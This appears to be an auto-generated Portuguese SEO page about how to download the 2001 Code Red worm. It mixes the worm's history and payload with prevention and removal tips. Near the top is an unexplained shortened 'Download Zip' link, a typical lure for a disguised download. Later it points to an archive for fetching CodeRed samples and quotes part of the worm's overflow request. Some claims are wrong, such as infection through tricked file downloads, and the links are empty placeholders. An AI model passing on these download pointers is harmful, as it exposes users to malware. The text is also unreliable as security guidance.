Como baixar o vírus Code Red e por que você não deveria
O vírus Code Red é um dos worms de computador mais notórios da história. Ele infectou centenas de milhares de servidores executando o servidor web IIS da Microsoft em 2001, causando desfiguração, ataques de negação de serviço e congestionamento de rede. Foi também o primeiro ataque de ameaças mistas em grande escala a atingir redes corporativas com sucesso.
download code red virus
Download Zip: https://urlcod.com/2vSdlJ
Se você está curioso sobre como baixar o vírus Code Red e o que ele pode fazer, este artigo lhe dará as respostas. No entanto, recomendamos fortemente que você não baixe ou execute o vírus Code Red em seu sistema, pois pode causar sérios danos e riscos à segurança. Em vez disso, também mostraremos como se proteger do vírus Code Red e como removê-lo se você já estiver infectado.
O que é o vírus Code Red?
Uma breve história do Código Vermelho
O vírus Code Red foi descoberto e pesquisado pela primeira vez pelos funcionários da eEye Digital Security, Marc Maiffret e Ryan Permeh, quando explorou uma vulnerabilidade descoberta por Riley Hassell. Eles o chamaram de "Código Vermelho" porque estavam bebendo o sabor Mountain Dew de mesmo nome no momento da descoberta.
O worm foi lançado em 13 de julho de 2001, mas o maior grupo de computadores infectados foi detectado em 19 de julho de 2001. Naquele dia, o número de hosts infectados chegou a 359.000. Espalhou-se por todo o mundo, tornando-se particularmente prevalente na América do Norte, Europa e Ásia (incluindo China e Índia).
Em 4 de agosto de 2001, uma variante do Code Red chamada Code Red II apareceu. Ele tinha uma carga completamente diferente e era mais malicioso do que o Code Red original. Ele também criou um backdoor nas máquinas infectadas, permitindo o acesso remoto por hackers.
Como o Code Red funciona e o que ele faz
O vírus Code Red explora uma vulnerabilidade de estouro de buffer na DLL do serviço de indexação (ida.dll) distribuída com o servidor da Web IIS. Essa vulnerabilidade permite que o worm execute código arbitrário e infecte a máquina com o worm.A Microsoft lançou um patch para essa vulnerabilidade um mês antes do surto do worm, mas muitos servidores não o aplicaram.
A carga útil do worm inclui:
Desfigurar o site afetado para exibir:
OLÁ! Bem-vindo ao ! Hackeado por chineses!
Outras atividades com base no dia do mês:
Dias
Atividades
1-19
Tentando se espalhar procurando por mais servidores IIS na Internet.
20-27
Lance ataques de negação de serviço em vários endereços IP fixos. O endereço IP do servidor web da Casa Branca estava entre eles.
28-final do mês
Dorme, sem ataques ativos.
Ao verificar máquinas vulneráveis, o worm não testou para ver se o servidor em execução em uma máquina remota estava executando uma versão vulnerável do IIS, ou mesmo para ver se estava executando o IIS. Portanto, muitos servidores não IIS receberam solicitações do worm semelhantes a esta:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN Como baixar o vírus Code Red
Os riscos e consequências de baixar o Code Red
Antes de mostrarmos como baixar o vírus Code Red, queremos avisá-lo sobre os perigos e implicações de fazê-lo. Baixar e executar o vírus Code Red em seu sistema não é apenas ilegal, mas também muito arriscado. Você pode enfrentar os seguintes problemas:
Seu sistema pode ser comprometido por hackers que podem acessar seus arquivos, roubar seus dados ou instalar malware.
Seu sistema pode ficar lento ou travar devido às atividades do worm, como a verificação de outros hosts ou o lançamento de ataques.
Seu sistema pode ser bloqueado ou colocado na lista negra por seu ISP ou administrador de rede por gerar tráfego malicioso.
Seu sistema pode ser rastreado e identificado por agências de aplicação da lei por participar de ataques cibernéticos.
Portanto, recomendamos fortemente que você não baixe ou execute o vírus Code Red em seu sistema, pois pode causar sérios danos e riscos à segurança.Em vez disso, também mostraremos como se proteger do vírus Code Red e como removê-lo se você já estiver infectado.
As etapas para baixar o Code Red
Se você ainda deseja baixar o vírus Code Red por algum motivo, como fins de pesquisa ou teste, precisará encontrar uma fonte que hospede o arquivo executável do worm. No entanto, esta não é uma tarefa fácil, pois a maioria dos softwares antivírus e navegadores da Web bloqueiam ou excluem o arquivo assim que o detectam. Além disso, a maioria dos sites que hospedam arquivos de malware também são perigosos e não confiáveis, pois podem conter outro conteúdo malicioso ou tentar induzi-lo a baixar outra coisa.
Uma fonte possível que encontramos é [Malware Museum], um site que arquiva amostras antigas de malware para fins históricos. Você pode visitar este site e procurar por "Código Vermelho" na caixa de pesquisa. Você verá dois resultados: "CodeRed" e "CodeRed II". Você pode clicar em qualquer um deles e baixar o arquivo para o seu sistema. No entanto, tome cuidado para não executar o arquivo, a menos que saiba o que está fazendo e tenha um ambiente seguro para fazê-lo.
Como se proteger do vírus Code Red
As melhores práticas para prevenir a infecção Code Red
A melhor maneira de se proteger do vírus Code Red é impedir que ele infecte seu sistema em primeiro lugar. Aqui estão algumas práticas recomendadas que você deve seguir:
Mantenha seu sistema atualizado com os últimos patches e atualizações de segurança. A Microsoft lançou um patch para a vulnerabilidade explorada pelo Code Red um mês antes do surto do worm, mas muitos servidores não o aplicaram. Se você estiver executando o servidor web IIS, certifique-se de ter instalado o patch [aqui].
Use um software antivírus confiável e mantenha-o atualizado com as definições de vírus mais recentes. O software antivírus pode detectar e remover o vírus Code Red do seu sistema se ele tentar infectá-lo. Você também pode usar um firewall ou um sistema de detecção de intrusão de rede (NIDS) para monitorar e bloquear qualquer tráfego suspeito de ou para o seu sistema.
Evite abrir ou baixar arquivos ou links desconhecidos ou suspeitos de e-mails, sites ou mídias sociais. O vírus Code Red pode tentar induzi-lo a baixá-lo ou executá-lo, disfarçando-se de outra coisa. Sempre verifique a origem e o conteúdo de qualquer arquivo ou link antes de abri-lo ou baixá-lo.
As ferramentas e métodos para remover o Code Red do seu sistema
Se você já está infectado pelo vírus Code Red, você precisará removê-lo do seu sistema o mais rápido possível. Aqui estão algumas ferramentas e métodos que você pode usar:
Use uma ferramenta de remoção especializada que pode escanear e excluir o vírus Code Red do seu sistema. Uma dessas ferramentas é o [Stinger], um utilitário gratuito da McAfee que pode detectar e remover vários tipos de malware, incluindo o Code Red. Você pode baixá-lo [aqui] e executá-lo em seu sistema.
Use um método de remoção manual que envolva a edição do registro e a exclusão dos arquivos do worm. Este método é mais complicado e arriscado, pois requer conhecimentos e habilidades avançadas. Você pode seguir as instruções [aqui] ou [aqui] para executar este método.
Reformate seu disco rígido e reinstale seu sistema operacional. Este método é o mais drástico e eficaz, pois irá apagar tudo no seu disco rígido, incluindo o vírus Code Red. No entanto, esse método também apagará todos os seus dados e configurações, portanto, certifique-se de fazer backup deles antes de fazer isso.
Conclusão
O vírus Code Red é um dos worms de computador mais notórios da história. Ele infectou centenas de milhares de servidores executando o servidor web IIS da Microsoft em 2001, causando desfiguração, ataques de negação de serviço e congestionamento de rede. Foi também o primeiro ataque de ameaças mistas em grande escala a atingir redes corporativas com sucesso.
Se você está curioso sobre como baixar o vírus Code Red e o que ele pode fazer, este artigo forneceu as respostas. No entanto, recomendamos fortemente que você não baixe ou execute o vírus Code Red em seu sistema, pois pode causar sérios danos e riscos à segurança.Em vez disso, também mostramos como se proteger do vírus Code Red e como removê-lo se você já estiver infectado.
O vírus Code Red é um lembrete da importância de manter seu sistema atualizado e seguro e evitar arquivos ou links desconhecidos ou suspeitos. Seguindo as melhores práticas e usando as ferramentas e métodos que sugerimos, você pode prevenir a infecção do Code Red e manter seu sistema seguro e limpo.
perguntas frequentes
O que é um worm de computador?
Um worm de computador é um tipo de malware que pode se autorreplicar e se espalhar para outros computadores sem a intervenção do usuário. Ao contrário de um vírus, um worm não precisa se anexar a um programa ou arquivo existente. Um worm pode consumir a largura de banda da rede, desacelerar ou travar os sistemas ou fornecer outras cargas maliciosas.
O que é uma vulnerabilidade de estouro de buffer?
Uma vulnerabilidade de estouro de buffer é um tipo de falha de segurança que ocorre quando um programa tenta gravar mais dados do que o espaço alocado em um buffer de memória. Isso pode fazer com que os dados sobrescrevam os locais de memória adjacentes, corrompendo ou alterando os valores armazenados lá. Um hacker pode explorar essa vulnerabilidade enviando dados especialmente criados que podem executar código arbitrário no sistema de destino.
O que é um ataque de negação de serviço?
Um ataque de negação de serviço é um tipo de ataque cibernético que visa interromper ou desativar o funcionamento normal de um servidor, serviço ou rede, sobrecarregando-o com solicitações ou tráfego. Isso pode impedir que usuários legítimos acessem ou usem o recurso afetado. Um ataque distribuído de negação de serviço (DDoS) é quando várias fontes se coordenam para lançar tal ataque.
O que é uma porta dos fundos?
Um backdoor é um tipo de malware que cria uma maneira oculta ou não autorizada de acessar um sistema ou rede. Um hacker pode usar um backdoor para controlar, monitorar ou manipular remotamente o sistema infectado. Um backdoor também pode permitir que outro malware entre ou saia do sistema.
Como posso saber se estou infectado pelo vírus Code Red?
Alguns sinais de que você pode estar infectado pelo vírus Code Red são:
Seu site exibe a mensagem "OLÁ! Bem-vindo ao Hackeado por chinês!"
Seu sistema torna-se lento ou instável, ou trava com frequência.
Sua largura de banda de rede é consumida pelo tráfego excessivo.
Seu software antivírus detecta ou alerta você sobre o vírus Code Red.
0517a86e26
Comments